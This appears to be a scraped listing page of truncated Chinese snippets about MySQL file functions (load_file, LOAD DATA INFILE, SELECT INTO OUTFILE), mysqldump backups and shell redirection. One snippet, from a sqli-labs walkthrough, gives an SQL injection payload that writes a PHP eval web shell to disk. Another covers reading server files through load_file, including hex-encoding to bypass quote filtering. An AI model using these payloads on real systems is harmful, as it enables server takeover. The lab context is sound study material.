load_file() 条件:要有file_priv权限 知道文件的绝对路径 能使用union 对web目录有读权限 如果过滤啦单引号,则可以将函数中的字符进行hex编码 步骤: 1.读/etc/init.d下的东西,这里有配置文件路径.…

LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name.txt' [REPLACE | IGNORE] INTO TABLE tbl_name [FIELDS [TERMINATED BY 'string'] [[OPTIONALLY] ENCLOSED BY 'char'] [ESCAPED BY 'char' ] ] [LINES [STARTING BY 'string'] [TERMINATED BY 'string…

1.load data: ***实际应用:把日志生成的xls文件load到MySQL中: mysql_cmd = "iconv -c -f utf-8 -t gbk ./data/al_ver_" + yesterday_time + ".xls -o ./data/GBK_al_ver_" + yesterday_time + ".xls " print(mysql_cmd) os.system(mysql_cmd) mysql_cmd = &…

一直以为两个函数作用是相同的   经过简单测试发现还是有些区别的   如下表admin   mysql> select * from admin;   +-----+-----------+---------+   | uid | name      | pass    |   +----+------------+---------+   |  1 | admin      | baidusb |     |  2 | root          | hacksb  | |  3 | mana…

该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用. 通过源代码我们很容易的写出了payload.倘若我们一个个去尝试的话,说实话,不容易. http://127.0.0.1/sql/Less-7/index.php?id=1')) and 1=1--+ Payload: http://127.0.0.1/sql/Less-7/index.php?id=1')) union select 1,'<?php eval($_POST[cmd])?>',3 into outfi…

select concat('insert into t_dm_stage(STAGE_ID,STAGE_NAME) values(',STAGE_ID,',','\'',STAGE_NAME,'\'',');') into outfile '/tmp/sql.txt' from t_dm_stage; 会在mysql服务器的/tmp/目录下生成一个sql.txt文件.…

1.备份工具mysqldump 客户端和服务器端都能用select outfile 只能写到服务器端 2.按表单位备份 a.单个表备份 mysqldump -uusername -p database table1 >tableback.sql mysql> select * into outfile 'D:\someBookes\mysql\pracitce\mysql_user.sql' fields terminated by ',' -> optionally enclosed…

原文网址:http://blog.chinaunix.net/uid-25909722-id-2912890.html 转自:http://blog.chinaunix.net/space.php?uid=7589639&do=blog&id=2897930 linux下a.out > outfile 2>&1重定向问题 问题源自在unix高级环境编程中的 a.out > outfile 2>&1 a.out 2> &1 >out…

原文网址:http://www.cnblogs.com/zhaoyl/archive/2012/10/22/2733418.html APUE 3.5关于重定向有个容易迷惑人的问题: ./a.out > outfile 2>&1 ./a.out 2>&1 > outfile 问两者区别.自己试了下, int main(){ printf("output to stdio\n"); fprintf(stderr,"output to st…

select into outfile用法 SELECT ... FROM TABLE_A INTO OUTFILE "/path/to/file" FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n'; load data infile用法 LOAD DATA INFILE "/path/to/file" INTO TABLE table_name; 注意…